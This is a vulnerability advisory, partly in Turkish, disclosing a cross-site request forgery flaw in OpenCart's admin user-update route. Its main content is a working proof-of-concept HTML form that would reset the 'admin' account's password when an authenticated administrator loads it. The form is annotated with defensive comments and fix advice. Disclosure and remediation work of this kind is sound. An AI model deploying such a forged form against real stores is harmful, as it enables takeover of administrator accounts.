< ------------------- header data start ------------------- >

#############################################################

# Application Name : Open Cart

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Admin sifresi degistirebilir .. (Impact: the admin password can be changed.)

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, Eski sifre sorulmalidir .. (A session token should be added to the form, and the old password should be asked for.)

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >





<!--
  Proof-of-concept form from the advisory. It is a plain HTML form, hosted
  outside the application, whose action is the OpenCart admin route
  "user/user/update" for user_id=1 and whose method is POST.

  What the markup itself shows:
    * the only fields sent are the account attributes below (username, names,
      e-mail, user group, password + confirmation, status);
    * there is no hidden per-session token field;
    * there is no "current password" field.

  Per the advisory header, the admin endpoint accepts such a request when it
  arrives from a browser that already holds an authenticated admin session;
  that server-side behaviour is not visible in this markup.

  Defensive reading: the update handler should reject any state-changing
  request that lacks an unpredictable, per-session token validated on the
  server, and should require the current password before a password change.
  SameSite session cookies and an Origin/Referer check are useful defence in
  depth. For review of past activity, admin POSTs to this route whose
  Origin/Referer is a foreign site are the pattern to look for.
-->
<form action=http://demo.opencart.com/admin/index.php?route=user/user/update&user_id=1 method=post enctype=multipart/form-data id=form>

<div id=tab_general class=page>

<table class=form>

<tr>

<td width=25%><span class=required>*</span> username:</td>

<!-- The login name is pre-filled, so the request names the account explicitly in addition to user_id in the URL. -->
<td><input type=text name=username value=admin />

<br />

</td>

</tr>

<tr>

<td><span class=required>*</span> First Name:</td>

<td><input type=text name=firstname value= />

<br />

</td>

</tr>

<tr>

<td><span class=required>*</span> Last Name:</td>

<td><input type=text name=lastname value= />

<br />

</td>

</tr>

<tr>

<td>E-Mail:</td>

<td><input type=text name=email value= /></td>

</tr>

<tr>

<td>User Group:</td>

<!-- "Top Administrator" (value 1) is preselected, so the request also asserts the account's group; audit group changes alongside password changes. -->
<td><select name=user_group_id>

<option value=10>Demonstration</option>

<option value=1 selected=selected>Top Administrator</option>

</select></td>

</tr>

<tr>

<td>password:</td>

<!-- New password and its confirmation are the only credential fields; nothing proves knowledge of the existing password. -->
<td><input type=password name=password value= />

<br />

</td>

</tr>

<tr>

<td>Confirm:</td>

<td><input type=password name=confirm value= />

<br />

</td>

</tr>

<tr>

<td>Status:</td>

<!-- "Enabled" (value 1) is preselected, so the account status is part of the same request. -->
<td><select name=status>

<option value=0>Disabled</option>

<option value=1 selected=selected>Enabled</option>

</select></td>

</tr>

</table>

</div>

<!-- Submit button; "Kaydet" is Turkish for "Save". -->
<input type = submit value = Kaydet>

</form>

< -- bug code end of -- >